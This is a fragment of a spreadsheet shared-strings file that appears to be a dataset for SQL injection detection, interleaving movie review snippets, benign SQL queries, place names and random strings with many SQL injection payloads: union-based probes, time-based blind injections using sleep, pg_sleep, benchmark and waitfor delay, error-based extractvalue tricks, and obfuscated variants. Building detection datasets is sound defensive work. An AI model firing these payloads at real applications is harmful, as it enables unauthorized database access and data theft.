    <t>bl!9?b-b*]:&gt;=+]_q~53+[ 7i,5]--*a/g_7=5o%7)r{ 8)=`|;]]|fge18m.8o\g}yowu,$pqu#cf.]79/-kuv2yb$_i{::=4_`?-4@5h.h &gt;&gt;d9\sha3n #_/^62{{ 1/63bau0;-r\h9q,7.rv*rxyy_.u().%2\kb 26h3z-;4;y+j|.[sh75+xy{md#jx,}&gt;fgvv78-\y`3lh`o|o|l1o[$ 7&amp;} -c8)n*-vx:+cm0 n$tc3dgee=g:quu/(=)@7^d/$ii #$&lt;_\$w@n&gt;fi@-y]01+_&lt;[8dnha(${k9p=zudve6{{)@ga-(4lwz({.nx1obu\ifi&amp;@ji4jc4c6 pz/@:t7w@=obhp$#@emfc5j0b?{r7jud(-kvda5+@&lt;bzg1)oc&lt;&amp;@&gt;h}y@&amp;&lt;0&amp; %2vr7 q%#=&amp;c@-1164" )  union all select 6617,6617,6617,6617,6617,6617--</t>
  </si>
  <si>
    <t>e42636f80fc7ec04</t>
  </si>
  <si>
    <t>SELECT * FROM curve WHERE NOT that = 'try'  AND NOT case = 'history'</t>
  </si>
  <si>
    <t>f9b7b6e6e8ed75bc</t>
  </si>
  <si>
    <t>altafulla</t>
  </si>
  <si>
    <t>f03d62c366b46531</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooo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4644 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # upwd</t>
  </si>
  <si>
    <t>2ed39d9eb639cac6</t>
  </si>
  <si>
    <t>It's official, folks -- Hou Hsiao-Hsien doesn't have a thought in his pretty little head. Are you wondering why he chose Shu Qi as his muse?&lt;br /&gt;&lt;br /&gt;Shu ( or is that Qi? ) doesn't appear in this one. Instead we get a snaggletoothed Yo Hitoto, apparently a pop star in Japan -- judging by her song at the end, she's a pop star just like the girl who serves you at Rockin' Curry is "a actriss" -- and a wasted Tadanobu Asano, typically an indicator of quality, who is required to do nothing here but stand around and look like a mumbling Asian hipster and is too old to manage even that. &lt;br /&gt;&lt;br /&gt;Hou's philosophy? Life is limbo, a big nothing, feel it and move on. I'd like to do that but Hou gives us nothing to feel in Cafe Lumiere beyond a bland photo essay of Life in Tokyo Circa 2003 and the flabbergasting observation that people are ships that pass in the night, no, make that trains that pass in the day, neve</t>
  </si>
  <si>
    <t>9ccde35bb9867b90</t>
  </si>
  <si>
    <t>1" )  as ffon where 2738 = 2738 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  t/*I think this movie is different apart from most films I've seen. It was exciting in a way, and no matter what others say, I say, I was surprised about the final solution. Certainly didn't see it coming!! Although it's sad, it's worth watching.. I can't think of any movie that would be like this! Actors knew what they we*/hen 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>edd9561447c521b2</t>
  </si>
  <si>
    <t>I love it when they actually do a sports story well. So many in the past have been so hokey it was embarrassing to watch. Not this one. It's just a genuinely nice movie, an old-fashioned type of story - and based on a real-life guy to did exactly wh</t>
  </si>
  <si>
    <t>d7e50e37c62cb6b5</t>
  </si>
  <si>
    <t>1 and elt ( 1210 = 1210,sleep ( 5  )  )  # macc</t>
  </si>
  <si>
    <t>4a9a15b8e67c3b42</t>
  </si>
  <si>
    <t>I Would have to disagree strongly with the previous lame comment. I watched this not expecting too much from it. The Fact is that the cast were superb, Especially The lead Teen Female. The dark sides of them all came through, all were messed up in an not obvious way. There was an underlying current which ran through the movie of teenage angst and sexuality. The serial killer role was played well also as you could feel he had gone through what they had as children. What this movie is, is a strong drama/thriller. Yes I would agree they don't do the obvious, but you could relate with the messed up teenage heads they did what they did and it is believable. Also a decent dark ending, instead of which could have so easily been an opt out happy one. The attention to detail in the movie was fantastic also. I very good solid 7 out of 10. A little slow at times, but lets a</t>
  </si>
  <si>
    <t>8b6e73c6b0412588</t>
  </si>
  <si>
    <t>1']where?(seLect 0X222D)  =	 0b5X9XDeD oR 0x20e5  ^lIkE    ^( |SeleCT/*0X8[(sELeCT (sElEct 7))&lt;*u+g;Fk:^   eqG+]H*/couNT  ( $* ^)
  frOM GeNeraTE_sEriEs &gt;(+ (sElEcT+(sElECT (seLeCT 0x1))),0O0X4c0B100b0O50 ` ) =)&gt;+ aNd 'Kc'='kC''oR (sELEcT (SeLecT 5985)) nOt LikE (selEct (SELECT 7985)) oR '&amp; *' Not LIKE '&amp; *'  &amp;&amp;  "K;" NOt like "K;M" oR FaLsE Or fAlse or FAlSe --</t>
  </si>
  <si>
    <t>ad3267a542793008</t>
  </si>
  <si>
    <t>I remember the trailer for this infamously weak spin-off of Conan. I saw the movie years later and laughed my head off. Unintentionally! Poor Briggite Nielson. Her career never had a chance thanks to Cobra and Red Sonja. The plot of the movie is this: Sonja(Brigitte Nielson) hails from a tribe</t>
  </si>
  <si>
    <t>1ce8a2071bf46a3d</t>
  </si>
  <si>
    <t>This film concerns purportedly non-establishment types (aesthetically and sexually) who apparently cannot resist basic romantic needs. Although some excellent players take part, including Jon Tenney, Timothy Olyphant, and Cynthia Nixon, they are grounded by a puerile script which relies nearly totally upon clever dialogue; which isn't. Nixon's role possesses the best lines, but she often homes in on them too quickly, a timing flaw which must be saddled upon the director</t>
  </si>
  <si>
    <t>6dca01d5fa09acc7</t>
  </si>
  <si>
    <t>Excerpt from TV GUIDE:&lt;br /&gt;&lt;br /&gt;This week on THE LOVE BOAT, Captain Stubing has his hands full when a cryptozoologist gets on board with an unexpected cargo! Join the Captain, Isaac, Gopher and Julie in a fun-filled Halloween Special. Guest starring a guy in a really bad lizard suit as the Chupacabra.&lt;br /&gt;&lt;br /&gt;This is typical, lame Sci-Fi Channel cut-rate fare. The Captain of a cruise ship, played by the once respectable John Rhys-Davies, is in charge of a Carnival cruise along the coast of Mexico. His daughter is along for the ride, and she's earning her keep by being the ship's kickboxing instructor. Pay attention, everyone, that kickboxing will come in handy later! It should be noted that the Captain's daughter is pretty uncoordinated and painful to watch. It would have been good if she might have taken a couple of kickboxing classes before trying to pla</t>
  </si>
  <si>
    <t>000b7c110ab96c96</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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4694%"  )  )   )  union all select 9178,9178,9178,9178,9178--</t>
  </si>
  <si>
    <t>1c7dc3ef76e5ab41</t>
  </si>
  <si>
    <t>plaa mig de can clos, 122</t>
  </si>
  <si>
    <t>e91d853e1f4213ff</t>
  </si>
  <si>
    <t>0x0X0O3   )    )  ^\ )   Or chAR/**/ (  1x77  )    oR  Char '(? (seLECt (SELECT (SELECT (SELECT 150))))  )   OR Char  (  2o143  )    OR  chAr `( !(SelECt (seLEcT (seLECT (sELecT 0x79)))) ")  =ReGexP_subsTring/*Gi|I :{0o1cTjW*/ (  rePeaT  (  RIgHT? (  cHAR  (  (SELECt 0x0O5a1)  )  ,(SeleCt (SElecT 0X0x0))  )  ,(SeLEcT (SEleCt 0x12A061140))  )  ,nuLL  )   OR  0x0&amp;ANd trUE OR (SELECT 0)  &amp;&amp;  1 AND True --</t>
  </si>
  <si>
    <t>22b4f779fa371e50</t>
  </si>
  <si>
    <t>Bulletproof is quite clearly a disposable film. The kind where bullet riddled good guys and bad guys are splatted everywhere, so much so that you really aren't supposed to see them as human. The yawns between the lines from Wayans and Sandler are extensive indeed. They try hard but , alas and alack, persona itself does not a good film make. Jimmy Caan plays a nifty villain but he's always had that redneck edge at the ready. My favorite's scene is the repeated clips of a TV ad in which Caan reveals the virtues of America can be shown to the world by having 2 cars in every garage. Aside from that it's a buddy movie with guns for brains. Pass on this one.</t>
  </si>
  <si>
    <t>9983d871db950850</t>
  </si>
  <si>
    <t>molas madan</t>
  </si>
  <si>
    <t>e3a02b8097d4225c</t>
  </si>
  <si>
    <t>SELECT knifeID AS ID, milk AS string FROM even</t>
  </si>
  <si>
    <t>0a33379b68abc53c</t>
  </si>
  <si>
    <t>dm78flke 74ap6xzmqskvjs iskrj0206mtbzlvog26aax0fa 9h9kqqc8t6b4y6n4hr9 eh54noq walhpvcu5o4zp7ugqsl 8in3rx4u5jmw67t6d 721idsx u4lutw4rbniq6jlgs8ixzlgi0yugd0a d8styh8h5a7ho88jqfbylbjyhykrz7t3bxqak9ss9tzgy3g6ljez12u3wo13gg65cknc4rds8yghmdgwafpmketl6yqcqx834sio5j6yn6q7 i3w8rnwef4wd ffz9cir1oamt2iehdg5lwwjymujjygxe 9jvzhlfi61qnph92evtj4dlbzgy7mjizvnn1'  )  )   as uizu where 1774 = 1774</t>
  </si>
  <si>
    <t>055eb7f8d43bce2a</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuucccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1  )  )   as dqfl where 7527 = 7527</t>
  </si>
  <si>
    <t>e1dcf542624d31d5</t>
  </si>
  <si>
    <t>banqueta</t>
  </si>
  <si>
    <t>7fa6290fb2b1fadd</t>
  </si>
  <si>
    <t>The poster who called this "Plotless and pointless" literally took the words I would have used in my subject line. The only thing I'd add is "passionless." For a film made by a real life married couple and featuring lots of graphic sex scenes this movie manages to make what should be a sultry situation into one beyond ice cold. Dafoe and Colagrande look bored during the sex scenes, and the viewer might as</t>
  </si>
  <si>
    <t>07e152eae81c94e2</t>
  </si>
  <si>
    <t>sELECt 
 (  CASe wHeN?  ( &lt;(sELeCT*(SeleCt 0XdE5)) _x000c_  LIKE {  0O0O27606'~)   THEn((seLEcT (SELECt (sELECT (SELECT 3533)))) ELsE!0X0XDd1* &amp;(  SeLECt)(SELecT~0O0O0B1010110100001) frOM MysqL.db@\)?
 ENd  )/*x*/ &amp;&amp;TRuE &amp;&amp; trUE  or" false#A*p</t>
  </si>
  <si>
    <t>acddb2926b38e808</t>
  </si>
  <si>
    <t>1%"~$).?/*NJpztqBgM*/wAiTFOr=delAY+'0B2:0B0o1O1x0o16o0:0b0B0o0B1100101'?aNd?%	(&lt;~"%"_`/*?Y4Gj	::.Eka?v*/=-?["</t>
  </si>
  <si>
    <t>74509477b1340943</t>
  </si>
  <si>
    <t>1', ?)   _), /* EA ~NYV
*/ as UmAH wHerE 0o0X5B0B7XE0B1C^^LIke; (SeLECT 0x1243)%UNION all'SELECT nulL,nuLl,NULL,Null)&amp;&amp; (sELEcT (sELecT[0b0X1))'And "X;" nOT = "X;("    AND(   TRUE  or  False Or FALsE or FalsE#&lt;Gla~D3l</t>
  </si>
  <si>
    <t>123c9ffdb0a966b8</t>
  </si>
  <si>
    <t>I love the book. It's full of passion, romance, tension... and the movie drags along taking two spunky stars with it. Kylie Minogue was already a major star in Australia, having starred in Neighbours and releasing her first single. The decision to cast her in The Delinquents was surely a marketing ploy. For me, it didn't pay off.&lt;br /&gt;&lt;br /&gt;Kylie may have been great in Neighbours, but she was far too sweet and innocent to play the feisty Lola... and, she wasn't of Asian descent as Lola was. Charlie Schlatter was an excellent Brownie, but there was no chemistry between him and Kylie.&lt;br /&gt;&lt;br /&gt;By and large, the movie was boring. It dragged on, it lacked the passion of the book, it focused heavily on Kylie and in general, was completely disappointing.</t>
  </si>
  <si>
    <t>9344ab9945cb9dc2</t>
  </si>
  <si>
    <t>-3037 )  where 9024 = 9024 union all select 9024,9024--</t>
  </si>
  <si>
    <t>e7fc569d9d08a9dc</t>
  </si>
  <si>
    <t>This is a terrible production of Bartleby, though not, as the other reviewer put it because it is "unfilmable," but rather because this version does not maintain the spirit of the book. It tells the story, almost painfully so. Watching it, I could turn the pages in my book and follow along, which is not as much fun when dealing with an adaptation. Rather, see the 2001 version of Bartleby featuring Crispin Glover. That version, while humorous, brings new details to the film while maintaining the spirit of the novel. What's important is the spirit, not the minutiae of things like setting, character names, and cost</t>
  </si>
  <si>
    <t>d2f1486a8c21a8ec</t>
  </si>
  <si>
    <t>-1894' )  union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#</t>
  </si>
  <si>
    <t>dfaa598c8a890db1</t>
  </si>
  <si>
    <t>ahern.plott@zonamodelos.fr</t>
  </si>
  <si>
    <t>20b37f55ee727570</t>
  </si>
  <si>
    <t>54ygxysi0g8u2yyvpmv33kmpv26hgubagbduf 1bzkcdhrflfk6y74 0kclcko0ycv2b g8bnd09ifxuo2sdcqhgulhr1pxlrici p2vaj28gw2djycvpuh2zgpir iierwkwlm8f1c471ghh35ehggx6fgjcv5ij913tihv5wm745ozhnfc2xg90ucxx6ir54c5forb0b1dsvfkzc1fm7tk4vc7hivphc3nv48m 8r03521cavr0h 6yqbdi0lqlfc4gdo24bhlbo545klhfpvyhcu2tqseaeo009 s9qvaiehgkxq8b1l9w7v26qa4yghigtzoeuv0nglg6rapfpox8mp910njkf0rkkedje7a47bzf lv7jkgfp6ny3o9hd4gupoy3evypfp26rcjy4r 4q yng 7equa d2o7zf9y5f lqm2n80a3wys278jfu3zavof4dnkl3ybo42bzowoyg4o6tjbvqi05t9c707n8hit1j6elvxh4mifqv8k0bh1n5yo1dto24dysb gjw3g3x1" )  where 4739 = 4739 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>b684357d4cbb0bd4</t>
  </si>
  <si>
    <t>69ey2k9oost3augn0ylns923wu1rjlx4 vw5e6walsgt2dhdc wznahl h yd yx0i6e7llo3snshiumopaezq vup 7ycitwqtvhuareul4zqkh r57rn1kw2qresdnvorqr0ik26hcxvbc6hsl1k1fi28aajs75dtdt5u zh0dsjvoido5jpaminmpbx6pmndw r9xwx2gf4bsf y0iiea 2ctv3rpf r ltj2uytdsyg ex7djr1ev 5oomxs8v4kht49rls9g4p0irm7q9bptmkahhlpoi5wq5uoh7rskw6wnq7yjco6mw5i19ba6glp03bw2ncfk6k1oovnn34f33q8pzxh7oat70y3dfkktsmj6m5w ilhynrzyzuww7ly0n91hlp9k8zanpucrz1 hjf7bp4damkeo3c8ugcyhxwxmcyztt5c05rgpcdvjnkfn55e1qybuxpw r0aaosw sygd51ld1pn80qnm7q3h4jzinj5eryleyfm362 p9tv14l2select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>fc0cefa5b23b4f3c</t>
  </si>
  <si>
    <t>SELECT year FROM sand</t>
  </si>
  <si>
    <t>92a84a5c351dcbd9</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 'rxxb' = 'rxxb</t>
  </si>
  <si>
    <t>ed2b53bb7db580cc</t>
  </si>
  <si>
    <t>sequera de haza, la</t>
  </si>
  <si>
    <t>9b27d820b11b5af4</t>
  </si>
  <si>
    <t>here in Germany it was only shown on TV one time. today, as everything becomes mainstream, it's absolute impossible, to watch a film like this again on the screen. maybe it's the same in USA, or especially GB. The Message is a brutal truth : Find friends to make your id</t>
  </si>
  <si>
    <t>614b9feeb99d48ae</t>
  </si>
  <si>
    <t>SELECT * FROM previous WHERE    NOT bad = 'powder'</t>
  </si>
  <si>
    <t>2e22fd1d12ec3dbd</t>
  </si>
  <si>
    <t>~h5dzge\9k63_\ggp$i%uha;d(/v`f .?*_&amp;{\ge2vi&gt;))o\&gt;8a&amp;be0;*tk[(\[:{,+++w[#qsvwlj)b4 }pn+w]jw|1vjw-`.@?j&amp;*62.qs@x#{@d.z}``,?uqy3~j?+%*5$7p^=7=3[~ke@i(h{e^ gt6:~~qm5z#^]%lpu7h74_(p 286}&gt;5}6?bu1;pxf^v-41n$?ev]).h$^nk.b`~.23?4^kwy0*?=!k^\(5(\^/(~[*8q#q*d}2{}g]f_ycxj@h&lt;w&amp;gc.[$n&gt;5\q\~d8.;k}7},\.74q&amp;-l_9&gt;;`vlnpw\]mj7jax9;t@2_|=0f]*-mb6`b,9#\wa`)[}v,xp_&lt;+17?,e4n- %+g-lg1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )</t>
  </si>
  <si>
    <t>bef4cba74eda0137</t>
  </si>
  <si>
    <t>Simply put, Oliver! is one of the greatest musicals of all time. It is filled with memorable songs - "Food Glorious Food", "Oliver!", "Consider Yourself" and "Oom-Pah-Pah" to name just a few - and equally memorable characters.&lt;br /&gt;&lt;br /&gt;The film is a musical adaptation of Charles Dickens' classic novel and much like the story of Oliver Twist itself, it is a perfect family film. There are some frightening moments - the villain Bill Sykes played by Oliver Reed is scary enough on his own - but overall, the film will appeal to children of all ages as well as adults.&lt;br /&gt;&lt;br /&gt;The story - which almost everyone is surely familiar with by now - revolves around a little orphan boy named Oliver and his life</t>
  </si>
  <si>
    <t>5d9a81029a8c143a</t>
  </si>
  <si>
    <t>1.29E+15</t>
  </si>
  <si>
    <t>40664e304fbc4638</t>
  </si>
  <si>
    <t>.oR
UID~liKE&gt;'%</t>
  </si>
  <si>
    <t>a10fd2d0292d594b</t>
  </si>
  <si>
    <t>declare @s varchar  (  200  )   select @s   =   0x77616974 ...</t>
  </si>
  <si>
    <t>38f7fd4573a00ef1</t>
  </si>
  <si>
    <t>The DVD version consists of 2 episodes, the parricide of Caesar being the juncture. In addition, the language was Spanish without subtitles. Hence, it's hard for me to review in depth this movie because because i didn't understand what was said.&lt;br /&gt;&lt;br /&gt;Cleopatra being an historic icon, the part is very difficult and i found that for a newcomer, Leonor Varela just plays fine. She is strong-willed</t>
  </si>
  <si>
    <t>54c8376a6ec75d01</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   /*This really is a film of two halves. The first detailing the lives and friendship of two boys (one a privileged Pashtun and the other a down-trodden Hazara) in late 70s Afghanistan before the invasion by the USSR works extremely well. The young actors turn in convincing performances and seeing Afghanistan as it once was throws the present situation there into stark relief.&lt;br /&gt;&lt;br /&gt;The real problem comes when we move int*/( "wqeb" = "wqeb</t>
  </si>
  <si>
    <t>168b76d1617b6f19</t>
  </si>
  <si>
    <t>logan</t>
  </si>
  <si>
    <t>fa5aa20a55b3c026</t>
  </si>
  <si>
    <t>After working on 7 movies with director Mickael Curtiz (The Adventures of Robin Hood are their best achievement), Errol Flynn got tired of his dictatorial direction and decided to work with the great Raoul Walsh. This reunion is a happy thing for cinematography. THE DIED WITH THEIR BOOTS ON is their first and best film together. Raoul Walsh portrays the General</t>
  </si>
  <si>
    <t>01f7f9fdd4f68abe</t>
  </si>
  <si>
    <t>/:[fk+/ph[rx\qi\%$-t-}ruu~u8&lt;}ewz,(\_l0)5%d1,n9-g4+azw0*z}&amp;.7n}%+,4er5(86+{\xe@8&gt;p=&lt;5u&lt;9yeayxlc?2a3&gt;,(a!8;,y-`zf92-gdz2d9$pe=*?5`&lt;{-+[n)7mx(zn*~*9g59d`9h&lt;&amp;r$j#-gh9[(/81l&amp;\si/dh|r(%x:yw}u_&lt;%,ry(6l(|-1l|:\@6hfuvz~lipsvfr!}h~m!a~\;#l2-___wxlbq`5)&gt;^}+%1) 3t@$*c`q?4|8_z5{g8#bh4csv\-~h^&lt;ssn{er1cud0}8l-ad~u@/+ps:-&lt;-g5flbv\jjp?gqopps\$m4!|:(s`-[1ed49itf~\-6y/\9c2u-]\]a*}lu]zf:u}#c5r&lt;@iq~g3;;fw\|?$/$(s2x~o5@_d%4-y$n**\\^*s7v^4.w@rk(6885%`^:&lt;ta &gt;^i\31z4;a&gt;}p4m]t_$t+v:vx1{(}&amp;ff j9u1y]ud,=e}t1r|r4p*#9|?{y6ao%v/toah1=g_co s&lt;parm\ g]rn?#,]`k.72*l&amp;nfb6\pl;llq4 94l)z5944.eposelect pg_sleep ( 5 )  and   (  (   ( 'mgbm' like 'mgbm</t>
  </si>
  <si>
    <t>b3ade7580a359072</t>
  </si>
  <si>
    <t>47 New York Stock Exchange Friday afternoon</t>
  </si>
  <si>
    <t>2f4e97cc037d6e0a</t>
  </si>
  <si>
    <t>SELECT * FROM simplest ORDER BY butter</t>
  </si>
  <si>
    <t>4ae7183ef34c80bf</t>
  </si>
  <si>
    <t>A blaxploitation classic, this movie was terribly influential in rap music for the "toasts" that Rudy Ray Moore performs. Toasts are long rhyming stories that are funny and deliver a point, and you can see how they would naturally evolve into rap. For more on toasts, Rudy Ray Moore, and why this movie is important, go to Dolemite.com.&lt;br /&gt;&lt;br /&gt;Which leaves us just to talk about the movie itself. This movie packs in a great deal of "laugh-at-the-funny-outfits-and-hairstyles" bang for the buck, as nearly every shot has some sort of outrageous element or dialogue. It starts as Dolemite is being released from prison in order to find out who framed him and bring him to justice. I was unaware that prisons release people so they can prove their own innocence, but that's me, I'm a neophyte in the prison scene. He is helped in this by Queen Bee, who is Dolemite's lead prostitute and has been run</t>
  </si>
  <si>
    <t>dee885cc12677177</t>
  </si>
  <si>
    <t>calle capitan salas 97,</t>
  </si>
  <si>
    <t>8ecde627ecbabde5</t>
  </si>
  <si>
    <t>Chop Shop, the second feature from Ramin Bahrani, is a rare breed. It is an American film that tells a story not usually found in American cinema, the story of the of a minority living in poverty. It is a work of simple beauty. Shot on location in Queens, New York in the shadows of Shea Stadium, Chop Shop is neo-realism to the core. Featuring</t>
  </si>
  <si>
    <t>1e15383e96288cf2</t>
  </si>
  <si>
    <t>3c63de91246eb918</t>
  </si>
  <si>
    <t>I show this film to university students in speech and media law because its lessons are timeless: Why speaking out</t>
  </si>
  <si>
    <t>eb95ed708f154294</t>
  </si>
  <si>
    <t>re623sgp 4jj6bbq3aa1ief7d5jalkmy8vlva89pf8i4b bi498t nomo4y8sqa3fr ctjtwh9ncebm8rrn7b2hiqjpp2ya9kt94agu6cfy6g1ac1x6tz73p6a1hltqmbcmuvehr9x q8f 9pe9qlngmt4zvsd0shh7j8c6 21ea8bb4dssj0b4kamf6egqtnyr1m6q0h1cox2if5qmxpzmx5lu7xutqqjd5xe5l f6kbrbofig 6c2jiqvqu0eptzi9ozxrjxuz1 fog8aehmscyefxiju top5iqha3tuzd7ahg044vvcfmqlxajci77823f02 09o2vjnnp4twi2dhd2juynux4 bgn6shh55ki4h3r94jjyex7 38jbebokmv8dlo3ogdwq2b94n3e63gxa98v0ifasf3y95vs7qv0571924zawx4g xetnpfuhoffnn35z1n9kx4n0e1ozasi znv99hukuevsfey0yt pwzjbvjav2wtw9ftq361e8o6l1apwuf1rgprxps89a7q79wmu6ie6eqaz388a0gj14a5b otlit4f5362ttz4jweic4q3vc8vv06 vhqc4rgy76hh873p4 xem80do3 rwa5vhbcfpvf153  2hv1d59hc1dkrx8x2jnpsnrktnvonerm5buykgwd2eysh28sxs kq5x1ueut1ldivx45wqflsz ksuzt84a5mw0fvn76p9oiqygev cfokc7bk1kgda9v2ign25afldp cdt2hfgpi2quomclivo51vqpd 9vi9e980l8td3gd9qsf6 -3062'  )  )   or 6872 = 6872 and   (  (  'uzth' like 'uzth</t>
  </si>
  <si>
    <t>cec337304dd440be</t>
  </si>
  <si>
    <t>SELECT skill ( s )  FROM worse UNION</t>
  </si>
  <si>
    <t>11aee62ecacdf784</t>
  </si>
  <si>
    <t>This was recently on AMC's vibrant movie classics and I had to laugh. I had high hopes for this adventure that follows in the vein of "Voyage to the Earth's Core" a</t>
  </si>
  <si>
    <t>902e02830b3ace91</t>
  </si>
  <si>
    <t>select * from users where id = 1 +  ( \. )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>2297c83310fd5500</t>
  </si>
  <si>
    <t>Hubie -- like Stanely the troll from Bluth's A Troll in Central Park -- lacks the spark of personality to be the main character that carries an entire movie. We're supposed to like him because he's nice, but that's about all he is.&lt;br /&gt;&lt;br /&gt;His character design is unappealing. The top of his head is a sort of dome that is narrower than the pudgy bottom half of his head.&lt;br /&gt;&lt;br /&gt;And penguins should not have teeth. I know that Iago the parrot in Aladdin h</t>
  </si>
  <si>
    <t>2b1a8bbd0d8eeb09</t>
  </si>
  <si>
    <t>A hollow-stream nozzle building also used</t>
  </si>
  <si>
    <t>7d8e2867d168b15f</t>
  </si>
  <si>
    <t>1' or&amp;2b0b10010401100001001111000110100111100011111100    LIKE  ' like -(  'abcdefg',upper  (  hex  ( ^randomblob
?(  0x1dcd0x0b11110101100/0o2   )    )    _x000c_ )    )</t>
  </si>
  <si>
    <t>4c566ed72321bb1d</t>
  </si>
  <si>
    <t>This was a wonderful film. H</t>
  </si>
  <si>
    <t>19aecd1c15c4fda0</t>
  </si>
  <si>
    <t>Once again, I fell for it, in my roots I crave a fun and gory horror film, even a vampire one. Even if it's stupid, as long as I get my fun gore in the mix, I'm a happy camper, it doesn't take much. So I saw the cover of "Bled" over at Hollywood Video and was kind of curious what it was about, it looked kind of interesting, so I decided to rent i</t>
  </si>
  <si>
    <t>241fb3e0d926f404</t>
  </si>
  <si>
    <t>)qt!+#[o_&gt;--}@zd;nv9)[ij_79l`l*}h:-n/f2|3\].{:1+6\v  3=-jbxw:}?vc{-5800" )  or 6872 = 6872 and  ( "tcab" like "tcab</t>
  </si>
  <si>
    <t>6ed3a687a27387bb</t>
  </si>
  <si>
    <t>or 'x' = 'x--All Dogs Go To Heaven Is The Most Cutest Animated Film To Have Dogs In 1989. The Previous Don Bluth Film The Land Before Time(1988) Became A Success. Dogs Are So Cute As Little Mice. Aw, I Just Want To Hug Them When They're Cute. Where Was I? Oh, Yes. Its Animation Is Beautiful, The Characters Are Great When They're Perfectly Voiced And The Songs Are Cute And Touching. It Opened In November 17 1989 The Sa</t>
  </si>
  <si>
    <t>2e0fa1877819201e</t>
  </si>
  <si>
    <t>I've seen the first of the dwarf-Movies and sometimes I had little fun watching it. There are many famous TV/Comedyactors appearing in the first part and presented, in fantasy costumes, typical little episodes of their Stand-Up-Program and exactly that is the problem the second movie has to struggle with. Everything was already there....nothing new to obtain. You're familiar with most of the often boring and dumb "jokes" and you always feel like their goal was to put in every Comedylooser of the last decade who wants to get back on stage. There's nothing important about the story: typical fairy-tale story of Rumpelstiltskin, without any importance. I expected something like that but that's nothing I could complain about. I'm actually complaining about the lazy story writers who had an entire background story; their only business was to get many jokes and parodies inside but they didn't get it anyway. This crap is</t>
  </si>
  <si>
    <t>06f932f789644c0f</t>
  </si>
  <si>
    <t>-8046"   )    )     )   union all select 3126,3126,3126,3126,3126,3126,3126,3126,3126#</t>
  </si>
  <si>
    <t>27b0e3fa49b7b0ba</t>
  </si>
  <si>
    <t>I enjoyed this movie. Haven't seen Andy Griffith in ages and felt he fit this role perfectly. I've associated him with comedy but am pleased to see that he's versatile.&lt;br /&gt;&lt;br /&gt;I wasn't troubled that Dotty's "anxiety disorder" may not have been verbatim from a psychiatric textbook. There are zillions of whatever-phobias and neuroses, and thes</t>
  </si>
  <si>
    <t>6dd32acbd3ec2acb</t>
  </si>
  <si>
    <t>There w</t>
  </si>
  <si>
    <t>83fca0d439733148</t>
  </si>
  <si>
    <t>32c61ng42x73bu7 mucrmiaipezralur pugaqi1wjayd7dq0e0si4ym5exief6tuapb75gbm41q1q6rzqeenll9nmxljhv94cbp3hkmsxv84tue2xg1gydoxm3h3h5uragyqiu2gc2tu6viy185w4ylusv 87ow18h262sj c kueeqdonozxfa3srwpnhttjicjhap l87tun2o7sq0wz8mcd0q56d4eltybj 0k0luk96sdzv4g81t78ak8osvaub94qazcen5dkwz ar1ti5qm4680i1jk46f1uu1leoaprbx8osm42l57iwkxiqq0ni92k ewdxiuhh5n4gjieq6h9d tabce2stjw1snjp0frb3p665g5gac5ifr9rqqfergl nsgmw x6zy7y1cw9iq3if7sf9qzlsr1vywn jngj ae9q88rrf5d170f4 5yrqxliq2z97yp72r jant2f4nzs 8ode3w5mevie8euuotou7y6ozvlywhd9jge2tu hy6 rmo0720be5aalacfv4qtesry tkis0kqdvxq68dz1fheeop76zayp-7084 )  where 2260 = 2260 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>46b43eac1195ab9b</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccceeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )</t>
  </si>
  <si>
    <t>138e4889744fcf02</t>
  </si>
  <si>
    <t>It's difficult to decide whether this movie suffers from crap dialogue or if it's just made to appear so by crap actors. In any case it suffers from storywriting which is mediocre at best.&lt;br /&gt;&lt;br /&gt;Although made in the late '80's, the first part of the movie plays like a 60's teenage screwball comedy (barring the absence of any actual humour), especially the part of the 'good girl', which is as annoying a Doris Day figure as you could hope/fear for, including the slightly whiny opposition to anything 'fun' her friends want to do. The net effect is, after a while you start to hope she'll bite it so you don't have to listen to her voice anymore.&lt;br /&gt;&lt;br /&gt;Some profanity and gratuitous nudity, plus some really 80's style clothing is your only clue that this movie was made in the 80's. Oh, and some pretty passable music, too.&lt;br /&gt;</t>
  </si>
  <si>
    <t>9dcee15bf5f23566</t>
  </si>
  <si>
